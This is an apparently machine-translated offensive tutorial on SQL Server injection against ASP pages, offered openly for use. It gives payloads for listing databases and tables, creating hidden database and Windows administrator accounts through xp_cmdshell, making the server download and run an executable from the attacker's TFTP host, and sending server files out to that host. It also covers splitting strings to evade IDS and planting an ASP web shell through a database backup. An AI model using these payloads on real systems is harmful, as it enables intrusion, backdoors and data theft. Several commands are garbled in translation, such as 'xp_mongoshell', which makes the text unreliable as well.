Advanced SQL Server INJECTION SKILLS of Guilin veterans

Now, the veteran's years of SQL Server injection advanced skills are presented to friends who support veterans:

Preface:
Other basic injection methods are not described in detail.
You cannot understand the basic injection articles on this site.
For better use of injection, we suggest you read the SQL syntax articles on this site.

[Retrieve all database names]
Select name from Master. DBO. sysdatabases where dbid = 7 // The value of dbid is more than 7.

[Retrieve data table name] [update the field value to the table name, and read the value of this field to get the table name]
Select top 1 name from database name. DBO. sysobjects where xtype = 'U' and status> 0 and name not in ('table ')

[Obtain the field name of a data table] [update the field value to the field name, and then read the value of this field to obtain the field name]
Select top 1 Database Name. DBO. col_name (object_id ('name of the data table to be queried '), field columns such as: 1) [Where condition]

Create a database administrator account and a system administrator account through sqlserver injection vulnerability [the current account must be a SysAdmin Group]

News. asp? Id = 2; Exec master. DBO. sp_addlogin Test, test; -- // Add the database user test with the password Test
News. asp? Id = 2; Exec master. DBO. sp_password test, 123456, test; -- // if you want to change the password, use this sentence (change the password of test to 123456)
News. asp? Id = 2; Exec master. DBO. SP_ADDSRVROLEMEMBER test, SysAdmin; -- // Add test to the SysAdmin group. Members of this group can perform any operation
News. asp? Id = 2; Exec master. DBO. xp_mongoshell 'net user test/add'; -- // Add the System user test with the password Test
News. asp? Id = 2; Exec master. DBO. xp_mongoshell 'net localgroup administrators test/add'; -- // upgrade system user test to administrator

In this way, you have left the test administrator account in both the database and system.

The following figure shows how to run file.exe after your server downloads the file [prerequisite: You must set your computer as a TFTP server and open port 69]

Id = 2; Exec master. DBO. xp_cmdshell 'tftp-I your IP get file.exe ';--

Then run the file:
Id = 2; Exec master. DBO. xp_cmdshell 'file.exe ';--

Download the file2.doc file of the server to the local TFTP server [the file must exist]:

Id = 2; Exec master. DBO. xp_mongoshell 'tftp-I your IP put file2.doc ';--

Bypassing IDS detection [using variables]
Declare @ A sysname set @ A = 'xp _ '+ 'your shell' exec @ a' dir C :/'
Declare @ A sysname set @ A = 'xp '+' _ cm '+ 'dshell' exec @ a' dir C :/'

Newly Added:

Create a table. There is only one field in the format of image, which writes ASP content. Export the database as a file
Backup database dbname to disk = 'd:/web/DB. asp ';

An error is reported to get the system OS and database system version number.
Id = 2 and 1 <> (select @ version );